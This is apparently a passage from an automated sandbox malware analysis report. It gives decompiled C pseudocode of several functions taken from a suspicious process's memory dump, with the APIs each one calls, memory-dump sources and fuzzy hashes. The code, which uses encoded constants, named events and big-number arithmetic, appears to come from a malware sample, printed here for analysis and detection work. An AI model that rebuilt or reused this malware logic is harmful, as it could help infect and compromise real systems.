                                                                                                                                  								_t63 = _v24;
                                                                                                                                  								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                                  								if(_t118 >= 0) {
                                                                                                                                  									_t130 = _v20;
                                                                                                                                  									if(_t130 != 0) {
                                                                                                                                  										_t67 = 3;
                                                                                                                                  										_v64 = _t67;
                                                                                                                                  										_v48 = _t67;
                                                                                                                                  										_v56 = 0;
                                                                                                                                  										_v40 = 0;
                                                                                                                                  										if(_t130 > 0) {
                                                                                                                                  											while(1) {
                                                                                                                                  												_t68 = _v24;
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												_t123 = _t123;
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                                                                                                  												if(_t118 < 0) {
                                                                                                                                  													goto L16;
                                                                                                                                  												}
                                                                                                                                  												_t70 = _v8;
                                                                                                                                  												_t109 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  												_t28 = _t109 + 0x22be0bc; // 0x3050f1ff
                                                                                                                                  												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                                                                                                  												if(_t118 >= 0) {
                                                                                                                                  													_t75 = _v16;
                                                                                                                                  													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                                                                                                  													if(_t118 >= 0 && _v12 != 0) {
                                                                                                                                  														_t79 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  														_t33 = _t79 + 0x22be078; // 0x76006f
                                                                                                                                  														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                                  															_t83 = _v16;
                                                                                                                                  															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                                                                                                  														}
                                                                                                                                  														 *_t87(_v12);
                                                                                                                                  													}
                                                                                                                                  													_t77 = _v16;
                                                                                                                                  													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                                                                                                  												}
                                                                                                                                  												_t72 = _v8;
                                                                                                                                  												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                                  												_v40 = _v40 + 1;
                                                                                                                                  												if(_v40 < _v20) {
                                                                                                                                  													continue;
                                                                                                                                  												}
                                                                                                                                  												goto L16;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								L16:
                                                                                                                                  								_t65 = _v24;
                                                                                                                                  								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                  							}
                                                                                                                                  							 *_t87(_v28);
                                                                                                                                  						}
                                                                                                                                  						_t58 = _v32;
                                                                                                                                  						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t118;
                                                                                                                                  			}





































                                                                                                                                  0x022b4e4a
                                                                                                                                  0x022b4f96

                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(022BC290), ref: 022B4E55
                                                                                                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 022B4F36
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 022B4F4F
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 022B4F7E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Free$Alloclstrcmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1885612795-0
                                                                                                                                  • Opcode ID: 7270cefbe7f7aefd8bbe3146021ed5e185605cf3d75104630fe9f9b8dd924eac
                                                                                                                                  • Instruction ID: cd3128fed308e78e331778d61c474b2c09025b2b03edc80e37b7e533f32b1076
                                                                                                                                  • Opcode Fuzzy Hash: 7270cefbe7f7aefd8bbe3146021ed5e185605cf3d75104630fe9f9b8dd924eac
                                                                                                                                  • Instruction Fuzzy Hash: EB517075D00509EFCB01EFE4C898DEEB7BAEF88744B154984E915EB215DB31AD01CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 022B13B6
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 022B149B
                                                                                                                                    • Part of subcall function 022B4E05: SysAllocString.OLEAUT32(022BC290), ref: 022B4E55
                                                                                                                                  • SafeArrayDestroy.OLEAUT32(00000000), ref: 022B14EE
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 022B14FD
                                                                                                                                    • Part of subcall function 022B52B9: Sleep.KERNEL32(000001F4), ref: 022B5301
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3193056040-0
                                                                                                                                  • Opcode ID: 169f6ef10f5edc83d5224bf17bec5ba88bcb215db0facb248c63f5f80909b15a
                                                                                                                                  • Instruction ID: a350cc04ccc240ad62deb414954b2e497f4a40b5fc5dd505deb8870e4191e599
                                                                                                                                  • Opcode Fuzzy Hash: 169f6ef10f5edc83d5224bf17bec5ba88bcb215db0facb248c63f5f80909b15a
                                                                                                                                  • Instruction Fuzzy Hash: FC519336910609EFDB02CFE8D454ADEB7B6FF88744B148829E908DB224DB71ED15CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                  			E022B29ED(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				void _v92;
                                                                                                                                  				void _v236;
                                                                                                                                  				void* _t55;
                                                                                                                                  				unsigned int _t56;
                                                                                                                                  				signed int _t66;
                                                                                                                                  				signed int _t74;
                                                                                                                                  				void* _t76;
                                                                                                                                  				signed int _t79;
                                                                                                                                  				void* _t81;
                                                                                                                                  				void* _t92;
                                                                                                                                  				void* _t96;
                                                                                                                                  				signed int* _t99;
                                                                                                                                  				signed int _t101;
                                                                                                                                  				signed int _t103;
                                                                                                                                  				void* _t107;
                                                                                                                                  
                                                                                                                                  				_t92 = _a12;
                                                                                                                                  				_t101 = __eax;
                                                                                                                                  				_t55 = E022B8B37(_a16, _t92);
                                                                                                                                  				_t79 = _t55;
                                                                                                                                  				if(_t79 == 0) {
                                                                                                                                  					L18:
                                                                                                                                  					return _t55;
                                                                                                                                  				}
                                                                                                                                  				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                  				_t81 = 0;
                                                                                                                                  				_t96 = 0x20;
                                                                                                                                  				if(_t56 == 0) {
                                                                                                                                  					L4:
                                                                                                                                  					_t97 = _t96 - _t81;
                                                                                                                                  					_v12 = _t96 - _t81;
                                                                                                                                  					E022B4AA4(_t79,  &_v236);
                                                                                                                                  					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E022B2F01(_t101,  &_v236, _a8, _t96 - _t81);
                                                                                                                                  					E022B2F01(_t79,  &_v92, _a12, _t97);
                                                                                                                                  					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                                                                                                  					_t66 = E022B4AA4(_t101, 0x22bd1b0);
                                                                                                                                  					_t103 = _t101 - _t79;
                                                                                                                                  					_a8 = _t103;
                                                                                                                                  					if(_t103 < 0) {
                                                                                                                                  						L17:
                                                                                                                                  						E022B4AA4(_a16, _a4);
                                                                                                                                  						E022B28BA(_t79,  &_v236, _a4, _t97);
                                                                                                                                  						memset( &_v236, 0, 0x8c);
                                                                                                                                  						_t55 = memset( &_v92, 0, 0x44);
                                                                                                                                  						goto L18;
                                                                                                                                  					}
                                                                                                                                  					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                                                                                                  					do {
                                                                                                                                  						if(_v8 != 0xffffffff) {
                                                                                                                                  							_push(1);
                                                                                                                                  							_push(0);
                                                                                                                                  							_push(0);
                                                                                                                                  							_push( *_t99);
                                                                                                                                  							L022BAF6E();
                                                                                                                                  							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                  							asm("adc edx, esi");
                                                                                                                                  							_push(0);
                                                                                                                                  							_push(_v8 + 1);
                                                                                                                                  							_push(_t92);
                                                                                                                                  							_push(_t74);
                                                                                                                                  							L022BAF68();
                                                                                                                                  							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                  								_t74 = _t74 | 0xffffffff;
                                                                                                                                  								_v16 = _v16 & 0x00000000;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							_t74 =  *_t99;
                                                                                                                                  						}
                                                                                                                                  						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                                                                                                  						_a12 = _t74;
                                                                                                                                  						_t76 = E022B9947(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                                                                                                  						while(1) {
                                                                                                                                  							 *_t99 =  *_t99 - _t76;
                                                                                                                                  							if( *_t99 != 0) {
                                                                                                                                  								goto L14;
                                                                                                                                  							}
                                                                                                                                  							L13:
                                                                                                                                  							_t92 =  &_v92;
                                                                                                                                  							if(E022B4506(_t79, _t92, _t106) < 0) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							L14:
                                                                                                                                  							_a12 = _a12 + 1;
                                                                                                                                  							_t76 = E022BA708(_t79,  &_v92, _t106, _t106);
                                                                                                                                  							 *_t99 =  *_t99 - _t76;
                                                                                                                                  							if( *_t99 != 0) {
                                                                                                                                  								goto L14;
                                                                                                                                  							}
                                                                                                                                  							goto L13;
                                                                                                                                  						}
                                                                                                                                  						_a8 = _a8 - 1;
                                                                                                                                  						_t66 = _a12;
                                                                                                                                  						_t99 = _t99 - 4;
                                                                                                                                  						 *(0x22bd1b0 + _a8 * 4) = _t66;
                                                                                                                                  					} while (_a8 >= 0);
                                                                                                                                  					_t97 = _v12;
                                                                                                                                  					goto L17;
                                                                                                                                  				}
                                                                                                                                  				while(_t81 < _t96) {
                                                                                                                                  					_t81 = _t81 + 1;
                                                                                                                                  					_t56 = _t56 >> 1;
                                                                                                                                  					if(_t56 != 0) {
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					goto L4;
                                                                                                                                  				}
                                                                                                                                  				goto L4;
                                                                                                                                  			}





















                                                                                                                                  0x022b2ab0
                                                                                                                                  0x022b2ab7
                                                                                                                                  0x022b2abe
                                                                                                                                  0x022b2ac1
                                                                                                                                  0x022b2ac1
                                                                                                                                  0x022b2a8e
                                                                                                                                  0x022b2a8e
                                                                                                                                  0x022b2a8e
                                                                                                                                  0x022b2ac9
                                                                                                                                  0x022b2ad1
                                                                                                                                  0x022b2ada
                                                                                                                                  0x022b2adf
                                                                                                                                  0x022b2adf
                                                                                                                                  0x022b2ae4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022b2ae6
                                                                                                                                  0x022b2ae9
                                                                                                                                  0x022b2af3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022b2af5
                                                                                                                                  0x022b2af5
                                                                                                                                  0x022b2aff
                                                                                                                                  0x022b2adf
                                                                                                                                  0x022b2ae4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022b2ae4
                                                                                                                                  0x022b2b09
                                                                                                                                  0x022b2b0c
                                                                                                                                  0x022b2b0f
                                                                                                                                  0x022b2b16
                                                                                                                                  0x022b2b16
                                                                                                                                  0x022b2b23
                                                                                                                                  0x00000000
                                                                                                                                  0x022b2b23
                                                                                                                                  0x022b2a1e
                                                                                                                                  0x022b2a22
                                                                                                                                  0x022b2a23
                                                                                                                                  0x022b2a25
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022b2a25
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 022B2A9A
                                                                                                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 022B2AB0
                                                                                                                                  • memset.NTDLL ref: 022B2B50
                                                                                                                                  • memset.NTDLL ref: 022B2B60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$_allmul_aulldiv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3041852380-0
                                                                                                                                  • Opcode ID: 03de0a219767d81fb95b429bf7fe6d07f4372c38fdf787faa1aefacab4cada42
                                                                                                                                  • Instruction ID: 11dfbf6349b12e8385c5d2f100cb7dc2d9a35198ad61a3daca4c13015e88d4aa
                                                                                                                                  • Opcode Fuzzy Hash: 03de0a219767d81fb95b429bf7fe6d07f4372c38fdf787faa1aefacab4cada42
                                                                                                                                  • Instruction Fuzzy Hash: 95419F71A20319EBDB22DFE8CC84BDE776AEF45350F008629B919A7188DB74A944CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __initterm.LIBCMTD ref: 004184DA
                                                                                                                                  • __initterm.LIBCMTD ref: 004184EC
                                                                                                                                  • __CrtSetDbgFlag.LIBCMTD ref: 004184FF
                                                                                                                                  • ___freeCrtMemory.LIBCMTD ref: 00418516
                                                                                                                                    • Part of subcall function 0041B7D0: RtlEncodePointer.NTDLL(00000000,?,0041861B,?,?,0041B940), ref: 0041B7D7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __initterm$EncodeFlagMemoryPointer___free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2654307729-0
                                                                                                                                  • Opcode ID: 22c5ff8650e5ecce261691c2f25c41b6d99237bbe12ff81dfca7ab2a07f819b6
                                                                                                                                  • Instruction ID: 6bd00bf905759a03933d705d0fd224de655e123b4229a8450067f60dcc050531
                                                                                                                                  • Opcode Fuzzy Hash: 22c5ff8650e5ecce261691c2f25c41b6d99237bbe12ff81dfca7ab2a07f819b6
                                                                                                                                  • Instruction Fuzzy Hash: E041E575D00209EFDB14DFA4E584ADEBBB2FB48314F24426EE411B7690DB385881CB69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                  			E022B6150(signed int _a4, signed int* _a8) {
                                                                                                                                  				void* __ecx;
                                                                                                                                  				void* __edi;
                                                                                                                                  				signed int _t6;
                                                                                                                                  				intOrPtr _t8;
                                                                                                                                  				intOrPtr _t12;
                                                                                                                                  				short* _t19;
                                                                                                                                  				void* _t25;
                                                                                                                                  				signed int* _t28;
                                                                                                                                  				CHAR* _t30;
                                                                                                                                  				long _t31;
                                                                                                                                  				intOrPtr* _t32;
                                                                                                                                  
                                                                                                                                  				_t6 =  *0x22bd270; // 0xd448b889
                                                                                                                                  				_t32 = _a4;
                                                                                                                                  				_a4 = _t6 ^ 0x109a6410;
                                                                                                                                  				_t8 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  				_t3 = _t8 + 0x22be87e; // 0x61636f4c
                                                                                                                                  				_t25 = 0;
                                                                                                                                  				_t30 = E022B10B1(_t3, 1);
                                                                                                                                  				if(_t30 != 0) {
                                                                                                                                  					_t25 = CreateEventA(0x22bd2ac, 1, 0, _t30);
                                                                                                                                  					E022B8B22(_t30);
                                                                                                                                  				}
                                                                                                                                  				_t12 =  *0x22bd25c; // 0x2000000a
                                                                                                                                  				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E022B8F1B() != 0) {
                                                                                                                                  					L12:
                                                                                                                                  					_t28 = _a8;
                                                                                                                                  					if(_t28 != 0) {
                                                                                                                                  						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                                  					}
                                                                                                                                  					_t31 = E022B3485(_t32, 0);
                                                                                                                                  					if(_t31 == 0 && _t25 != 0) {
                                                                                                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                  					}
                                                                                                                                  					if(_t28 != 0 && _t31 != 0) {
                                                                                                                                  						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                                                  					}
                                                                                                                                  					goto L20;
                                                                                                                                  				} else {
                                                                                                                                  					_t19 =  *0x22bd10c( *_t32, 0x20);
                                                                                                                                  					if(_t19 != 0) {
                                                                                                                                  						 *_t19 = 0;
                                                                                                                                  						_t19 = _t19 + 2;
                                                                                                                                  					}
                                                                                                                                  					_t31 = E022B8B7B(0,  *_t32, _t19, 0);
                                                                                                                                  					if(_t31 == 0) {
                                                                                                                                  						if(_t25 == 0) {
                                                                                                                                  							L22:
                                                                                                                                  							return _t31;
                                                                                                                                  						}
                                                                                                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                  						if(_t31 == 0) {
                                                                                                                                  							L20:
                                                                                                                                  							if(_t25 != 0) {
                                                                                                                                  								CloseHandle(_t25);
                                                                                                                                  							}
                                                                                                                                  							goto L22;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					goto L12;
                                                                                                                                  				}
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 022B10B1: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04779C18,00000000,?,?,69B25F44,00000005,022BD00C,?,?,022B30FE), ref: 022B10E7
                                                                                                                                    • Part of subcall function 022B10B1: lstrcpy.KERNEL32(00000000,00000000), ref: 022B110B
                                                                                                                                    • Part of subcall function 022B10B1: lstrcat.KERNEL32(00000000,00000000), ref: 022B1113
                                                                                                                                  • CreateEventA.KERNEL32(022BD2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,022B991F,?,00000001,?), ref: 022B6191
                                                                                                                                    • Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,022B991F,00000000,00000000,?,00000000,?,022B991F,?,00000001,?,?,?,?,022B7D37), ref: 022B61F1
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,022B991F,?,00000001,?), ref: 022B621F
                                                                                                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,022B991F,?,00000001,?,?,?,?,022B7D37), ref: 022B6237
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 73268831-0
                                                                                                                                  • Opcode ID: b0a1d73652e75bc247f734b350bd5976d6b0dcf2d0f9443883fb804c555ca3b6
                                                                                                                                  • Instruction ID: 4a2eb19b2c949fd750520150ba4ecfff7750032b55263d6187a9914ffb0380e3
                                                                                                                                  • Opcode Fuzzy Hash: b0a1d73652e75bc247f734b350bd5976d6b0dcf2d0f9443883fb804c555ca3b6
                                                                                                                                  • Instruction Fuzzy Hash: 8221F232D713525FD7235EE8A848BFB73ADEF88B94B090A25F945D6219DBB0C8018A51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 40%
                                                                                                                                  			E022B9870(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v28;
                                                                                                                                  				char _v32;
                                                                                                                                  				void* __esi;
                                                                                                                                  				void* _t29;
                                                                                                                                  				void* _t38;
                                                                                                                                  				signed int* _t39;
                                                                                                                                  				void* _t40;
                                                                                                                                  
                                                                                                                                  				_t36 = __ecx;
                                                                                                                                  				_v32 = 0;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v12 = _a4;
                                                                                                                                  				_t38 = E022B2931(__ecx,  &_v32);
                                                                                                                                  				if(_t38 != 0) {
                                                                                                                                  					L12:
                                                                                                                                  					_t39 = _a8;
                                                                                                                                  					L13:
                                                                                                                                  					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                                  						_t16 =  &(_t39[1]); // 0x5
                                                                                                                                  						_t23 = _t16;
                                                                                                                                  						if( *_t16 != 0) {
                                                                                                                                  							E022B8DAB(_t23);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _t38;
                                                                                                                                  				}
                                                                                                                                  				if(E022B155A(0x40,  &_v16) != 0) {
                                                                                                                                  					_v16 = 0;
                                                                                                                                  				}
                                                                                                                                  				_t40 = CreateEventA(0x22bd2ac, 1, 0,  *0x22bd344);
                                                                                                                                  				if(_t40 != 0) {
                                                                                                                                  					SetEvent(_t40);
                                                                                                                                  					Sleep(0xbb8);
                                                                                                                                  					CloseHandle(_t40);
                                                                                                                                  				}
                                                                                                                                  				_push( &_v32);
                                                                                                                                  				if(_a12 == 0) {
                                                                                                                                  					_t29 = E022B5BC0(_t36);
                                                                                                                                  				} else {
                                                                                                                                  					_push(0);
                                                                                                                                  					_push(0);
                                                                                                                                  					_push(0);
                                                                                                                                  					_push(0);
                                                                                                                                  					_push(0);
                                                                                                                                  					_t29 = E022B4B2A(_t36);
                                                                                                                                  				}
                                                                                                                                  				_t41 = _v16;
                                                                                                                                  				_t38 = _t29;
                                                                                                                                  				if(_v16 != 0) {
                                                                                                                                  					E022B4FF0(_t41);
                                                                                                                                  				}
                                                                                                                                  				if(_t38 != 0) {
                                                                                                                                  					goto L12;
                                                                                                                                  				} else {
                                                                                                                                  					_t39 = _a8;
                                                                                                                                  					_t38 = E022B6150( &_v32, _t39);
                                                                                                                                  					goto L13;
                                                                                                                                  				}
                                                                                                                                  			}













                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(022BD2AC,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,022B7D37,?,00000001,?), ref: 022B98C1
                                                                                                                                  • SetEvent.KERNEL32(00000000,?,?,?,022B7D37,?,00000001,?,00000002,?,?,022B312C,?), ref: 022B98CE
                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,022B7D37,?,00000001,?,00000002,?,?,022B312C,?), ref: 022B98D9
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,022B7D37,?,00000001,?,00000002,?,?,022B312C,?), ref: 022B98E0
                                                                                                                                    • Part of subcall function 022B5BC0: WaitForSingleObject.KERNEL32(00000000,?,?,?,022B9900,?,022B9900,?,?,?,?,?,022B9900,?), ref: 022B5C9A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2559942907-0
                                                                                                                                  • Opcode ID: 4fc37dab20d15924300d346f2af296d3cc9d75f33d00cb08d95a26c037b44ce1
                                                                                                                                  • Instruction ID: e54c75ad1ea16630a130aef4050fc1889f30edd4d89bce1e35e473504f5ce1ea
                                                                                                                                  • Opcode Fuzzy Hash: 4fc37dab20d15924300d346f2af296d3cc9d75f33d00cb08d95a26c037b44ce1
                                                                                                                                  • Instruction Fuzzy Hash: 3C21DA73D1421AAFCF22BFE498849DE77BD9F08390B044826EB51A7108D7709981CFA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                  			E022B5F58(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				intOrPtr* _t28;
                                                                                                                                  				intOrPtr _t31;
                                                                                                                                  				intOrPtr* _t32;
                                                                                                                                  				void* _t39;
                                                                                                                                  				int _t46;
                                                                                                                                  				intOrPtr* _t47;
                                                                                                                                  				int _t48;
                                                                                                                                  
                                                                                                                                  				_t47 = __eax;
                                                                                                                                  				_push( &_v12);
                                                                                                                                  				_push(__eax);
                                                                                                                                  				_t39 = 0;
                                                                                                                                  				_t46 = 0;
                                                                                                                                  				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                  				_v8 = _t26;
                                                                                                                                  				if(_t26 < 0) {
                                                                                                                                  					L13:
                                                                                                                                  					return _v8;
                                                                                                                                  				}
                                                                                                                                  				if(_v12 == 0) {
                                                                                                                                  					Sleep(0xc8);
                                                                                                                                  					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                  				}
                                                                                                                                  				if(_v8 >= _t39) {
                                                                                                                                  					_t28 = _v12;
                                                                                                                                  					if(_t28 != 0) {
                                                                                                                                  						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                  						_v8 = _t31;
                                                                                                                                  						if(_t31 >= 0) {
                                                                                                                                  							_t46 = lstrlenW(_v16);
                                                                                                                                  							if(_t46 != 0) {
                                                                                                                                  								_t46 = _t46 + 1;
                                                                                                                                  								_t48 = _t46 + _t46;
                                                                                                                                  								_t39 = E022B1525(_t48);
                                                                                                                                  								if(_t39 == 0) {
                                                                                                                                  									_v8 = 0x8007000e;
                                                                                                                                  								} else {
                                                                                                                                  									memcpy(_t39, _v16, _t48);
                                                                                                                                  								}
                                                                                                                                  								__imp__#6(_v16);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_t32 = _v12;
                                                                                                                                  						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                  					}
                                                                                                                                  					 *_a4 = _t39;
                                                                                                                                  					 *_a8 = _t46 + _t46;
                                                                                                                                  				}
                                                                                                                                  				goto L13;
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1198164300-0
